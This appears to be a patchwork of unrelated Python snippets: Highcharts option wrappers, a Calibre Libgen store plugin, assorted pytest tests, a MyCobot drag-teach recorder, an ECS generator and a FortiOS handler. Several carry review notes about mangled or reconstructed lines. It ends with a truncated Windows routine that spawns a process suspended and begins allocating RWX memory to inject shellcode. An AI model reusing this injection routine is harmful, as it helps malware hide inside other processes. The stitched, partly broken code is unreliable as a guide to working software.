            raise ValueError(f'precision should be a float dtype, not {precision.kind}.')
        self.precision = precision
class EditableValue(AbstractValueType):
    """A value type whose entries may be edited through the data view.

    Editing can be switched off globally via the ``is_editable`` trait.
    """

    # Whether values of this type accept edits at all.
    is_editable = Bool(True, update_value_type=True)

    def is_valid(self, model, row, column, value):
        """Accept any candidate value; subclasses override to validate."""
        return True

    def has_editor_value(self, model, row, column):
        """Offer an editor only when the model allows writing this cell."""
        writable = model.can_set_value(row, column)
        return writable and self.is_editable

    def set_editor_value(self, model, row, column, value):
        """Write *value* into the model, rejecting invalid values."""
        if not self.is_valid(model, row, column, value):
            raise DataViewSetError('Invalid value set: {!r}'.format(value))
        model.set_value(row, column, value)
class OptionPlotoptionsAreaSonificationContexttracksMappingHighpassFrequency(Options):
    """Option wrapper for the Highcharts
    ``plotOptions.area.sonification.contextTracks.mapping.highpassFrequency``
    configuration subtree.

    NOTE(review): each accessor below is defined twice — a no-arg getter and a
    one-arg setter with the same name.  As written the second definition
    shadows the first; presumably ``@property`` / ``@<name>.setter``
    decorators were stripped from this generated file — confirm against the
    generator that produced it.
    """

    def mapFunction(self):
        # Getter: configured mapping function (default None).
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: store a raw (non-JavaScript) value.
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter: data property the mapping points at (default None).
        return self._config_get(None)

    def mapTo(self, text: str):
        # Setter: store the target property name.
        self._config(text, js_type=False)

    def max(self):
        # Getter: upper bound of the mapped range (default None).
        return self._config_get(None)

    def max(self, num: float):
        # Setter: store the upper bound.
        self._config(num, js_type=False)

    def min(self):
        # Getter: lower bound of the mapped range (default None).
        return self._config_get(None)

    def min(self, num: float):
        # Setter: store the lower bound.
        self._config(num, js_type=False)

    def within(self):
        # Getter: unit the min/max range is expressed in (default None).
        return self._config_get(None)

    def within(self, value: Any):
        # Setter: store the range unit.
        self._config(value, js_type=False)
class LibgenStore(StorePlugin):
    """Calibre store plugin that searches the Library Genesis fiction index."""

    def genesis(self):
        """Create the Libgen client used by every other entry point."""
        debug_print = partial(module_debug_print, 'LibgenStore:genesis:')
        debug_print('start')
        self.libgen = LibgenFictionClient()

    def search(self, query, max_results=10, timeout=60):
        """Yield a SearchResult for (the first mirror of) each matching book."""
        if not hasattr(self, 'libgen'):
            self.genesis()
        debug_print = partial(module_debug_print, 'LibgenStore:search:')
        debug_print('search:query = ', query)
        found = self.libgen.search(query)
        limit = min(max_results, len(found.results))
        for book in found.results[:limit]:
            debug_print('result.title = ', book.title)
            # Only the first mirror of each result is surfaced to the UI.
            for mirror in book.mirrors[0:1]:
                debug_print('result.mirror.url = ', mirror.url)
                s = SearchResult()
                s.store_name = PLUGIN_NAME
                s.cover_url = book.image_url
                s.title = '{} ({}, {}{})'.format(book.title, book.language, mirror.size, mirror.unit)
                s.author = book.authors
                s.price = 'FREE'
                s.detail_item = book.md5
                s.drm = SearchResult.DRM_UNLOCKED
                s.formats = mirror.format
                s.plugin_author = PLUGIN_AUTHORS
                debug_print('s = ', s)
                yield s

    def open(self, parent=None, detail_item=None, external=False):
        """Open the book's detail page, externally or in the embedded browser."""
        debug_print = partial(module_debug_print, 'LibgenStore:open:')
        debug_print('locals() = ', locals())
        if not hasattr(self, 'libgen'):
            self.genesis()
        if detail_item:
            detail_url = self.libgen.get_detail_url(detail_item)
        else:
            detail_url = self.libgen.base_url
        debug_print('detail_url = ', detail_url)
        if external or self.config.get('open_external', False):
            open_url(QUrl(detail_url))
        else:
            dialog = WebStoreDialog(self.gui, self.libgen.base_url, parent, detail_url)
            dialog.setWindowTitle(self.name)
            dialog.set_tags(self.config.get('tags', ''))
            dialog.exec_()

    def get_details(self, search_result, details):
        """Attach the direct download URL for the result's format."""
        url = self.libgen.get_detail_url(search_result.detail_item)
        download = self.libgen.get_download_url(search_result.detail_item)
        search_result.downloads[search_result.formats] = download
# NOTE(review): the decorator prefix was mangled in the source (only
# ".django_db(transaction=True)" survived); restored as the pytest-django
# marker — confirm against version control.
@pytest.mark.django_db(transaction=True)
def test_download_transactions_bad_column_list_raises(client, monkeypatch, download_test_data, elasticsearch_transaction_index):
    """Requesting an unknown download column must return HTTP 400 naming only the bad column."""
    setup_elasticsearch_test(monkeypatch, elasticsearch_transaction_index)
    download_generation.retrieve_db_string = Mock(return_value=get_database_dsn_string(settings.DOWNLOAD_DB_ALIAS))
    payload = {'filters': {'award_type_codes': ['A']}, 'columns': ['modification_number', 'bogus_column']}
    resp = client.post('/api/v2/download/transactions/', content_type='application/json', data=json.dumps(payload))
    assert (resp.status_code == status.HTTP_400_BAD_REQUEST)
    # The error detail names the unknown column but not the valid one.
    assert ('Unknown columns' in resp.json()['detail'])
    assert ('bogus_column' in resp.json()['detail'])
    assert ('modification_number' not in resp.json()['detail'])
class TracingTestShortTraceId(AmbassadorTest):
    """Checks that `trace_id_128bit: false` makes the tracer emit 64-bit
    (16-hex-character) trace IDs instead of 128-bit ones."""

    def init(self):
        self.target = HTTP()
        self.zipkin = Zipkin()

    def config(self) -> Generator[(Union[(str, Tuple[(Node, str)])], None, None)]:
        # Mapping for the traced service.
        (yield (self.target, self.format('\n---\napiVersion: getambassador.io/v3alpha1\nkind: Mapping\nname: tracing_target_mapping_64\nhostname: "*"\nprefix: /target-64/\nservice: {self.target.path.fqdn}\n')))
        # TracingService with 128-bit trace IDs explicitly disabled.
        (yield (self, self.format('\n---\napiVersion: getambassador.io/v3alpha1\nkind: TracingService\nname: tracing-64\nservice: {self.zipkin.path.fqdn}:9411\ndriver: zipkin\nconfig:\n trace_id_128bit: false\n')))

    def queries(self):
        # Phase 1: generate a trace by hitting the mapped service.
        (yield Query(self.url('target-64/'), phase=1))
        # NOTE(review): this line was corrupted in the source; reconstructed as
        # the Zipkin trace-fetch query whose response check() reads from
        # self.results[1] — confirm the exact URL against version control.
        (yield Query(f'http://{self.zipkin.path.fqdn}:9411/api/v2/traces', phase=check_phase))
        (yield Query(self.url('ambassador/v0/diag/'), phase=check_phase))

    def check(self):
        # results[1] is the Zipkin response: a list of traces, each a list of spans.
        trace = self.results[1].json[0][0]
        traceId = trace['traceId']
        # 64-bit trace IDs are 16 hex characters (128-bit would be 32).
        assert (len(traceId) == 16)
def CreateBmmRCRPermOperator(manifest):
    """Register f16 row/col/row batched-GEMM-permute operator instances.

    Builds one DeviceBatchedGemmCPermuteXdl operation per (tile description,
    gemm specialization) pair, appends each to *manifest*, and returns the
    list of created operations.
    """
    operation_kind = library.GemmKind.BatchGemmPermute
    a_element_desc = library.TensorDesc(library.DataType.f16, library.LayoutType.RowMajor)
    b_element_desc = library.TensorDesc(library.DataType.f16, library.LayoutType.ColumnMajor)
    c_element_desc = library.TensorDesc(library.DataType.f16, library.LayoutType.RowMajor)
    element_op = library.TensorOperation.PassThrough
    tile_descriptions = [gemm.TileDesc(256, 256, 128, 32, 8, 8, 32, 32, 4, 2), gemm.TileDesc(256, 128, 256, 32, 8, 8, 32, 32, 2, 4), gemm.TileDesc(256, 128, 128, 32, 8, 8, 32, 32, 2, 2), gemm.TileDesc(256, 128, 64, 32, 8, 8, 32, 32, 2, 1), gemm.TileDesc(256, 64, 128, 32, 8, 8, 32, 32, 1, 2), gemm.TileDesc(128, 128, 128, 32, 8, 8, 32, 32, 4, 2), gemm.TileDesc(128, 128, 64, 32, 8, 8, 32, 32, 2, 2), gemm.TileDesc(128, 64, 128, 32, 8, 8, 32, 32, 2, 2), gemm.TileDesc(64, 64, 64, 32, 8, 8, 32, 32, 2, 2), gemm.TileDesc(128, 128, 32, 32, 8, 8, 32, 32, 2, 1), gemm.TileDesc(128, 32, 128, 32, 8, 8, 32, 32, 1, 2), gemm.TileDesc(64, 64, 32, 32, 8, 8, 32, 32, 2, 1), gemm.TileDesc(64, 32, 64, 32, 8, 8, 32, 32, 1, 2)]
    block_descriptions = []
    c_block_descriptions = []
    # Derive per-tile block-transfer parameters from the thread-block size.
    for t in tile_descriptions:
        block_transfer = (- 1)
        c_block_transfer = (- 1)
        if (t.block_size == 256):
            block_transfer = [4, 64, 1]
            c_block_transfer = gemm.CBlockTransferDesc(1, 1, [1, 32, 1, 8], 8)
        if (t.block_size == 128):
            block_transfer = [4, 32, 1]
            if (t.n_per_block == 128):
                c_block_transfer = gemm.CBlockTransferDesc(1, 1, [1, 16, 1, 8], 8)
            else:
                c_block_transfer = gemm.CBlockTransferDesc(1, 1, [1, 32, 1, 4], 8)
        if (t.block_size == 64):
            block_transfer = [4, 16, 1]
            c_block_transfer = gemm.CBlockTransferDesc(1, 1, [1, 16, 1, 4], 8)
        # Fixed: the message used to be AND-ed into the condition
        # (`assert a and b and 'msg'`), so it could never be displayed.
        assert (block_transfer != (- 1)) and (c_block_transfer != (- 1)), ('Cannot determine block_transfer_size with block_size ' + str(t.block_size))
        block_descriptions.append(gemm.BlockTransferDesc(block_transfer, [1, 0, 2], [1, 0, 2], 2, 8, 8, 1))
        c_block_descriptions.append(c_block_transfer)
    gemm_specialization = [gemm.GemmSpecialization.GemmDefault, gemm.GemmSpecialization.MNKPadding]
    operations = []
    for gemm_spec in gemm_specialization:
        for (tile_desc, block_desc, c_block_desc) in zip(tile_descriptions, block_descriptions, c_block_descriptions):
            new_operation = gemm.GemmOperation(operation_kind=operation_kind, extra_kind=element_op, xdl_op_type=gemm.XdlOpType.DeviceBatchedGemmCPermuteXdl, A=a_element_desc, B=b_element_desc, C=c_element_desc, a_elem_op=element_op, b_elem_op=element_op, epilogue_functor=element_op, gemm_specialization=gemm_spec, tile_desc=tile_desc, a_block_transfer=block_desc, b_block_transfer=block_desc, c_block_transfer=c_block_desc)
            manifest.append(new_operation)
            operations.append(new_operation)
    return operations
class TeachingTest(Helper):
    """Interactive drag-teach recorder/player for a (dual-arm) MyCobot.

    Records encoder snapshots while the robot is moved by hand, replays them
    once or in a loop, and can persist recordings to a local JSON file.
    """

    def __init__(self, mycobot) -> None:
        super().__init__()
        # Fixed: the original assigned the undefined global `mb` instead of
        # the constructor argument, raising NameError on instantiation.
        self.mb = mycobot
        self.recording = False   # True while the recorder thread samples
        self.playing = False     # True while the loop-player thread runs
        self.record_list = []    # captured encoder snapshots (~20 Hz)
        self.record_t = None     # recorder thread
        self.play_t = None       # loop-player thread

    def record(self):
        """Start sampling encoder values on a daemon thread (every ~50 ms)."""
        self.record_list = []
        self.recording = True

        def _record():
            _id = 0
            while self.recording:
                _encoders = self.mb.get_encoders(_id)
                if _encoders:
                    # Keep only snapshots long enough to contain the
                    # second-to-last slot (guards against partial reads).
                    if _encoders[-2:-1]:
                        self.record_list.append(_encoders)
                time.sleep(0.05)

        self.echo('Start recording.')
        self.record_t = threading.Thread(target=_record, daemon=True)
        self.record_t.start()

    def stop_record(self):
        """Stop the recorder thread and wait for it to finish."""
        if self.recording:
            self.recording = False
            self.record_t.join()
            self.echo('Stop record')

    def play(self):
        """Replay the recording once, sending encoder targets every 50 ms."""
        self.echo('Start play')
        for _encoders_data in self.record_list:
            print(_encoders_data)
            # Snapshot layout (presumably: [0:7]/[14:21] are the two arms'
            # encoders, [7:14]/[21:28] their speeds, tail slots the gripper
            # — TODO confirm against the firmware docs).
            _encoders = _encoders_data[0:7] + _encoders_data[14:21] + _encoders_data[-2:-1]
            _speeds = _encoders_data[7:14] + _encoders_data[21:28] + _encoders_data[-1:]
            self.mb.set_encoders(0, _encoders, _speeds)
            time.sleep(0.05)
        self.echo('Finish play')

    def loop_play(self):
        """Replay the recording forever on a daemon thread until stopped."""
        self.playing = True

        def _loop():
            len_ = len(self.record_list)
            i = 0
            while self.playing:
                idx_ = i % len_
                i += 1
                _encoders_data = self.record_list[idx_]
                print(_encoders_data)
                _encoders = _encoders_data[0:7] + _encoders_data[14:21] + _encoders_data[-2:-1]
                _speeds = _encoders_data[7:14] + _encoders_data[21:28] + _encoders_data[-1:]
                self.mb.set_encoders(0, _encoders, _speeds)
                time.sleep(0.05)

        self.echo('Start loop play.')
        self.play_t = threading.Thread(target=_loop, daemon=True)
        self.play_t.start()

    def stop_loop_play(self):
        """Stop the loop player and wait for its thread to exit."""
        if self.playing:
            self.playing = False
            self.play_t.join()
            self.echo('Stop loop play.')

    def save_to_local(self):
        """Dump the current recording next to this script as record.txt (JSON)."""
        if not self.record_list:
            self.echo('No data should save.')
            return
        with open(os.path.dirname(__file__) + '/record.txt', 'w') as f:
            json.dump(self.record_list, f, indent=2)
        self.echo('save dir: {}'.format(os.path.dirname(__file__)))

    def load_from_local(self):
        """Load a previously saved recording from record.txt."""
        with open(os.path.dirname(__file__) + '/record.txt', 'r') as f:
            try:
                data = json.load(f)
                self.record_list = data
                self.echo('Load data success.')
            except Exception:
                self.echo('Error: invalid data.')

    def print_menu(self):
        """Show the single-key command menu."""
        print(' \r q + Enter: quit\n \r r + Enter: start record\n \r c + Enter: stop record\n \r p + Enter: play once\n \r P + Enter: loop play / stop loop play\n \r s + Enter: save to local\n \r l + Enter: load from local\n \r f + Enter: release mycobot\n \r\n ')

    def start(self):
        """Main key-command loop (single-char reads on Linux, line reads on Windows)."""
        global WIN, LINUX
        self.print_menu()
        while True:  # was `while (not False)`
            if WIN:
                key = input()
            elif LINUX:
                with Raw(sys.stdin):
                    key = sys.stdin.read(1)
            if key == 'q':
                break
            elif key == 'r':
                self.record()
            elif key == 'c':
                self.stop_record()
            elif key == 'p':
                self.play()
            elif key == 'P':
                if not self.playing:
                    self.loop_play()
                else:
                    self.stop_loop_play()
            elif key == 's':
                self.save_to_local()
            elif key == 'l':
                self.load_from_local()
            elif key == 'f':
                # Release both arms so the robot can be moved by hand again.
                self.mb.release_all_servos(0)
                time.sleep(0.05)
                self.mb.release_all_servos(2)
                self.echo('Released')
            else:
                print(key)
                continue
def main() -> None:
    """Entry point for the ECS artifact generator.

    Loads the schema files for the requested git ref, applies optional
    subset/exclude filters, and writes the generated artifacts (intermediate
    files, CSV, ES templates, Beats config) plus — unless a partial run was
    requested without --force-docs — the asciidoc documentation.
    """
    args = argument_parser()
    ecs_generated_version: str = read_version(args.ref)
    print(('Running generator. ECS version ' + ecs_generated_version))
    # Default output locations; --out relocates both under the given root.
    out_dir = 'generated'
    docs_dir = 'docs'
    if args.out:
        default_dirs = False
        out_dir = os.path.join(args.out, out_dir)
        docs_dir = os.path.join(args.out, docs_dir)
    else:
        default_dirs = True
    ecs_helpers.make_dirs(out_dir)
    # Including the experimental schemas marks the version with a "+exp" suffix.
    if (args.include and (loader.EXPERIMENTAL_SCHEMA_DIR in args.include)):
        ecs_generated_version += '+exp'
        print(('Experimental ECS version ' + ecs_generated_version))
    # Load -> clean -> finalize -> filter pipeline over the field definitions.
    fields: dict[(str, FieldEntry)] = loader.load_schemas(ref=args.ref, included_files=args.include)
    cleaner.clean(fields, strict=args.strict)
    finalizer.finalize(fields)
    (fields, docs_only_fields) = subset_filter.filter(fields, args.subset, out_dir)
    fields = exclude_filter.exclude(fields, args.exclude)
    (nested, flat) = intermediate_files.generate(fields, os.path.join(out_dir, 'ecs'), default_dirs)
    if args.intermediate_only:
        exit()
    # Emit the downstream artifacts from the nested/flat representations.
    csv_generator.generate(flat, ecs_generated_version, out_dir)
    es_template.generate(nested, ecs_generated_version, out_dir, args.mapping_settings, args.template_settings)
    es_template.generate_legacy(flat, ecs_generated_version, out_dir, args.mapping_settings, args.template_settings_legacy)
    beats.generate(nested, ecs_generated_version, out_dir)
    # Docs are skipped for customized field sets unless explicitly forced.
    if ((args.include or args.subset or args.exclude) and (not args.force_docs)):
        exit()
    ecs_helpers.make_dirs(docs_dir)
    docs_only_nested = intermediate_files.generate_nested_fields(docs_only_fields)
    asciidoc_fields.generate(nested, docs_only_nested, ecs_generated_version, docs_dir)
def compare_versions(vA, vB):
    """Three-way compare of two version strings.

    Returns 1 if *vA* sorts after *vB*, -1 if before, 0 if equal.  A missing
    tag counts as a final release, so it sorts after any pre-'final' tag.
    """
    releaseA, tagA, tagnumA = parse_version(vA)
    releaseB, tagB, tagnumB = parse_version(vB)
    # Release tuples dominate everything else.
    if releaseA != releaseB:
        return 1 if releaseA > releaseB else -1
    # Untagged (final) releases sort after pre-release tags like 'beta'.
    if tagA is None and tagB is None:
        return 0
    if tagA is None:
        return 1 if tagB < 'final' else -1
    if tagB is None:
        return -1 if tagA < 'final' else 1
    # Both tagged: compare tag names, then tag numbers.
    if tagA != tagB:
        return 1 if tagA > tagB else -1
    if tagnumA != tagnumB:
        return 1 if tagnumA > tagnumB else -1
    return 0
# NOTE(review): the next two lines look like mock decorators whose callable
# (presumably unittest.mock.patch or similar) was stripped during extraction.
# As written they are no-op string expressions, so mock_run / mock_vmsm will
# not be injected — restore the decorators from version control.
('ciftify.config.verify_msm_available')
('ciftify.bidsapp.fmriprep_ciftify.run')
def test_ux07_default_one_subject_one_session_for_synth(mock_run, mock_vmsm):
    """One participant/session run: no --anat_only fmriprep calls, six
    SDC-enabled fmriprep calls, exactly one ciftify_recon_all call."""
    uargs = [synth_bids, '/output/dir', 'participant', '--participant_label=02', '--session_label=01']
    ret = simple_main_run(uargs)
    call_list = parse_call_list_into_strings(mock_run.call_args_list)
    assert (count_calls_to('fmriprep', call_list, call_contains='--anat_only') == 0)
    assert (count_calls_to('fmriprep', call_list, call_contains='--use-syn-sdc') == 6)
    assert (count_calls_to('ciftify_recon_all', call_list) == 1)
class _EnsembleStateTracker():
    """Tracks an ensemble's lifecycle state, warning on illegal transitions.

    Each known state has a handler; handlers always commit the transition but
    log a warning when the previous state makes the transition illegal.
    """

    def __init__(self, state_: str = state.ENSEMBLE_STATE_UNKNOWN) -> None:
        self._state = state_
        self._handles: Dict[str, _handle] = {}
        self._msg = 'Illegal state transition from %s to %s'
        self.set_default_handles()

    def add_handle(self, state_: str, handle: _handle) -> None:
        """Register the callback that performs the transition into *state_*."""
        self._handles[state_] = handle

    def _handle_unknown(self) -> None:
        if self._state != state.ENSEMBLE_STATE_UNKNOWN:
            logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_UNKNOWN)
        self._state = state.ENSEMBLE_STATE_UNKNOWN

    def _handle_started(self) -> None:
        if self._state != state.ENSEMBLE_STATE_UNKNOWN:
            logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_STARTED)
        self._state = state.ENSEMBLE_STATE_STARTED

    def _handle_failed(self) -> None:
        # Failure is legal from UNKNOWN or STARTED only.
        if self._state not in [state.ENSEMBLE_STATE_UNKNOWN, state.ENSEMBLE_STATE_STARTED]:
            logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_FAILED)
        self._state = state.ENSEMBLE_STATE_FAILED

    def _handle_stopped(self) -> None:
        if self._state != state.ENSEMBLE_STATE_STARTED:
            logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_STOPPED)
        self._state = state.ENSEMBLE_STATE_STOPPED

    def _handle_canceled(self) -> None:
        if self._state != state.ENSEMBLE_STATE_STARTED:
            logger.warning(self._msg, self._state, state.ENSEMBLE_STATE_CANCELLED)
        self._state = state.ENSEMBLE_STATE_CANCELLED

    def set_default_handles(self) -> None:
        """Install the built-in transition handlers for every known state."""
        defaults = {
            state.ENSEMBLE_STATE_UNKNOWN: self._handle_unknown,
            state.ENSEMBLE_STATE_STARTED: self._handle_started,
            state.ENSEMBLE_STATE_FAILED: self._handle_failed,
            state.ENSEMBLE_STATE_STOPPED: self._handle_stopped,
            state.ENSEMBLE_STATE_CANCELLED: self._handle_canceled,
        }
        for target, handle in defaults.items():
            self.add_handle(target, handle)

    def update_state(self, state_: str) -> str:
        """Transition into *state_* and return the resulting state."""
        if state_ not in self._handles:
            raise KeyError(f'Handle not defined for state {state_}')
        self._handles[state_]()
        return self._state
def test_contract_deployment_with_constructor_with_address_argument(w3, contract_with_constructor_address_factory):
    """Deploying with an address constructor arg yields the expected runtime bytecode."""
    constructor_arg = '0x16D9983245De15E7A9A73bC586E01FF6E08dE737'
    deploy_txn = contract_with_constructor_address_factory.constructor(constructor_arg).transact()
    txn_receipt = w3.eth.wait_for_transaction_receipt(deploy_txn)
    assert txn_receipt is not None
    assert txn_receipt['contractAddress']
    deployed_at = txn_receipt['contractAddress']
    deployed_code = w3.eth.get_code(deployed_at)
    assert deployed_code == decode_hex(CONSTRUCTOR_WITH_ADDRESS_ARGUMENT_CONTRACT_RUNTIME)
def validate(data=None, schema_id=None, filepath=None, root=None, definition=None, specs=None, validation_function=None, validation_error_handler=None, require_data=True, openapi_version=None):
    """Validate request data against a swagger/OpenAPI body schema.

    The schema is taken either from a YAML *filepath* (resolved relative to
    the caller unless *root* is given) or from an in-memory *specs* dict.
    *schema_id* (or its legacy alias *definition*) selects the schema; when
    omitted it is inferred from the body parameter's $ref or the first
    extracted definition.  Validation failures abort with HTTP 400 unless a
    *validation_error_handler* is supplied.
    """
    # `definition` is the legacy name for `schema_id`.
    schema_id = (schema_id or definition)
    if ((filepath is None) and (specs is None)):
        abort(Response('Filepath or specs is needed to validate', status=500))
    # Default to the current request's JSON body; a callable lazily produces it.
    if (data is None):
        data = request.json
    elif callable(data):
        data = data()
    if ((not data) and require_data):
        abort(Response('No data to validate', status=400))
    endpoint = request.endpoint.lower().replace('.', '_')
    verb = request.method.lower()
    if (filepath is not None):
        # Resolve the YAML file relative to the caller's directory (via the
        # call stack) unless an explicit root was provided.
        if (not root):
            try:
                frame_info = inspect.stack()[1]
                root = os.path.dirname(os.path.abspath(frame_info[1]))
            except Exception:
                root = None
        else:
            root = os.path.dirname(root)
        if (not filepath.startswith('/')):
            final_filepath = os.path.join(root, filepath)
        else:
            final_filepath = filepath
        full_doc = load_from_file(final_filepath)
        # Skip any docstring prelude before the '---' YAML document marker.
        yaml_start = full_doc.find('---')
        swag = yaml.safe_load(full_doc[(yaml_start if (yaml_start >= 0) else 0):])
    else:
        # Deep-copy so schema post-processing below can't mutate caller specs.
        swag = copy.deepcopy(specs)
    params = [item for item in swag.get('parameters', []) if item.get('schema')]
    definitions = {}
    main_def = {}
    raw_definitions = extract_definitions(params, endpoint=endpoint, verb=verb, openapi_version=openapi_version)
    # Infer the schema id from the body parameter's $ref when not given.
    if (schema_id is None):
        for param in params:
            if (param.get('in') == 'body'):
                schema_id = param.get('schema', {}).get('$ref')
                if schema_id:
                    schema_id = schema_id.split('/')[(- 1)]
                    break
    # Last resort: fall back to the first extracted definition's id.
    if (schema_id is None):
        if raw_definitions:
            schema_id = raw_definitions[0].get('id')
    # Split definitions into the main schema vs. referenced sub-schemas.
    for defi in raw_definitions:
        if (defi['id'].lower() == schema_id.lower()):
            main_def = defi.copy()
        else:
            definitions[defi['id']] = defi
    if (schema_id in extract_schema(swag)):
        main_def = extract_schema(swag).get(schema_id)
    # Inline sub-schemas so jsonschema can resolve local $refs; their 'id'
    # keys must be dropped to avoid resolver confusion.
    main_def['definitions'] = definitions
    for (key, value) in definitions.items():
        if ('id' in value):
            del value['id']
    if (validation_function is None):
        validation_function = jsonschema.validate
    # Base directory used to resolve file-based $refs in the schema.
    absolute_path = os.path.dirname(sys.argv[0])
    if (filepath is None):
        relative_path = absolute_path
    else:
        relative_path = os.path.dirname(filepath)
    main_def = __replace_ref(main_def, relative_path, swag)
    try:
        validation_function(data, main_def)
    except Exception as err:
        # Delegate to the custom handler when given; otherwise 400 with the
        # validator's message.
        if (validation_error_handler is not None):
            validation_error_handler(err, data, main_def)
        else:
            abort(Response(str(err), status=400))
# NOTE(review): the decorator prefix was mangled in the source (only
# ".parametrize(...)" survived); restored as the pytest marker — confirm.
@pytest.mark.parametrize('elasticapm_client', [{'include_paths': ('tests',), 'local_var_max_length': 20, 'local_var_list_max_length': 10}], indirect=True)
def test_exception_event(elasticapm_client):
    """Captured exceptions carry a truncated-variable stacktrace and no log data."""
    try:
        a_local_var = 1
        a_long_local_var = (100 * 'a')
        a_long_local_list = list(range(100))
        raise ValueError('foo')
    except ValueError:
        elasticapm_client.capture('Exception')
    assert (len(elasticapm_client.events) == 1)
    event = elasticapm_client.events[ERROR][0]
    assert ('exception' in event)
    exc = event['exception']
    assert (exc['message'] == 'ValueError: foo')
    assert (exc['type'] == 'ValueError')
    assert (exc['module'] == ValueError.__module__)
    assert ('stacktrace' in exc)
    frames = exc['stacktrace']
    assert (len(frames) == 1)
    frame = frames[0]
    # Fixed: the original read `assert frame['abs_path'], __file__.replace(('.pyc' == '.py'))`
    # — an assert-with-message that compared nothing and always passed.
    assert (frame['abs_path'] == __file__.replace('.pyc', '.py'))
    assert (frame['filename'] == os.path.join('tests', 'client', 'exception_tests.py'))
    assert (frame['module'] == __name__)
    assert (frame['function'] == 'test_exception_event')
    assert (not frame['library_frame'])
    assert (frame['vars']['a_local_var'] == 1)
    # local_var_max_length / local_var_list_max_length from the parametrized
    # client config govern the truncation below.
    assert (len(frame['vars']['a_long_local_var']) == 20)
    assert (len(frame['vars']['a_long_local_list']) == 12)
    assert (frame['vars']['a_long_local_list'][(- 1)] == '(90 more elements)')
    assert ('timestamp' in event)
    assert ('log' not in event)
    assert all(((frame['library_frame'] or frame['module'].startswith('tests')) for frame in event['exception']['stacktrace']))
def extractVouriatransBlogspotCom(item):
    """Map a vouriatrans.blogspot.com feed item to a release message.

    Returns None for previews or items without chapter/volume info, False
    when no known tag matches, otherwise the built release message.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if (not (chp or vol)) or ('preview' in item['title'].lower()):
        return None
    tagmap = [('ibtmlff', "I Became The Male Lead's Female Friend.", 'translated'), ('irvp', 'I Raised the Villains Preciously', 'translated'), ('tinpff', 'There is No Place For Fakes', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
    # Pick the first tag entry present on the item, if any.
    matched = next(((name, tl_type) for tagname, name, tl_type in tagmap if tagname in item['tags']), None)
    if matched is None:
        return False
    series, tl_type = matched
    return buildReleaseMessageWithType(item, series, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
def test_queue_info(tmp_path, capsys):
    """`queue info` must print both queues' status without mutating the data file."""
    cli_args = helpers.setup_temp_env(tmp_path)
    request_id = 'req-compile-bench--nobody-mac'
    queue_file = tmp_path / 'BENCH' / 'QUEUES' / 'mac' / 'queue.json'
    queue_file.write_text(json.dumps({'jobs': [request_id], 'paused': False}))
    __main__._parse_and_main([*cli_args, 'queue', 'info'], __file__)
    # The info command is read-only: the queue file must be unchanged.
    stored = json.loads(queue_file.read_text())
    assert (stored['jobs'] == [request_id])
    captured = capsys.readouterr()
    assert re.match(textwrap.dedent('\n Job Queue \\(linux\\):\n size: 0\n paused: False\n lock: \\(not locked\\)\n\n Files:\n data: .*?/BENCH/QUEUES/linux/queue.json\n lock: \\(.*?/BENCH/QUEUES/linux/queue.lock\\)\n log: \\(.*?/BENCH/QUEUES/linux/queue.log\\)\n\n Top 5:\n \\(queue is empty\\)\n\n Log size: 0\n Last log entry:\n \\(log is empty\\)\n\n Job Queue \\(mac\\):\n size: 1\n paused: False\n lock: \\(not locked\\)\n\n Files:\n data: .*?/BENCH/QUEUES/mac/queue.json\n lock: \\(.*?/BENCH/QUEUES/mac/queue.lock\\)\n log: \\(.*?/BENCH/QUEUES/mac/queue.log\\)\n\n Top 5:\n 1 req-compile-bench--nobody-mac\n\n Log size: 0\n Last log entry:\n \\(log is empty\\)\n ').strip(), captured.out.strip())
def fortios_firewall(data, fos):
    """Dispatch the access-proxy-virtual-host task and normalise its result.

    Returns the (failed, changed, response, diff) tuple expected by the
    FortiOS module runner.
    """
    fos.do_member_operation('firewall', 'access-proxy-virtual-host')
    if data['firewall_access_proxy_virtual_host']:
        resp = firewall_access_proxy_virtual_host(data, fos)
    else:
        fos._module.fail_json(msg=('missing task body: %s' % 'firewall_access_proxy_virtual_host'))
    succeeded = is_successful_status(resp)
    revision_changed = resp['revision_changed'] if ('revision_changed' in resp) else True
    return (not succeeded, succeeded and revision_changed, resp, {})
# NOTE(review): the next line looks like a mock decorator whose callable
# (presumably unittest.mock.patch) was stripped during extraction; as written
# it is a no-op string expression and `mock_check_call` will not be injected —
# restore the decorator from version control.
('subprocess.check_call')
def test_run_check_command_fail(mock_check_call):
    """A failing command raises CalledProcessError and produces no output."""
    mock_check_call.side_effect = check_call_side_effect
    cmd_parameters = cmd_exec.CommandParameters(cwd='/tmp')
    cmd = 'command_error'
    output = ''
    with pytest.raises(subprocess.CalledProcessError) as process_error:
        output = cmd_exec.run_check_command(cmd, cmd_parameters)
    # run_check_command raised, so `output` keeps its sentinel value.
    assert (not output)
    assert (f"Command '{cmd}' returned non-zero exit status" in str(process_error.value))
_os('windows')
def Inject(path, shellcode):
    """Spawn *path* suspended and attempt remote-thread shellcode injection.

    NOTE(review): as written this function cannot run. `windll` is referenced
    unqualified on the VirtualAllocEx line but only `ctypes` is imported, and
    `LPSECURITY_ATTRIBUTES` / `LPTHREAD_START_ROUTINE` (CreateRemoteThread
    argtypes) are neither imported nor provided by ctypes.wintypes — all three
    raise NameError. Windows-only (win32process / kernel32).
    """
    import ctypes, time
    import ctypes.wintypes
    from ctypes.wintypes import BOOL
    from ctypes.wintypes import DWORD
    from ctypes.wintypes import HANDLE
    from ctypes.wintypes import LPVOID
    from ctypes.wintypes import LPCVOID
    import win32process
    # Creation flag 4 — presumably CREATE_SUSPENDED; TODO confirm.
    info = win32process.CreateProcess(None, path, None, None, False, 4, None, None, win32process.STARTUPINFO())
    page_rwx_value = 64       # 0x40 — presumably PAGE_EXECUTE_READWRITE
    process_all = 2035711     # unused in this function
    memcommit = 4096          # 0x1000 — presumably MEM_COMMIT
    if (info[0].handle > 0):
        print(f'[+] - Created {path} Suspended')
        shellcode_length = len(shellcode)
        process_handle = info[0].handle
        # NOTE(review): `windll` is not in scope here (NameError).
        VirtualAllocEx = windll.kernel32.VirtualAllocEx
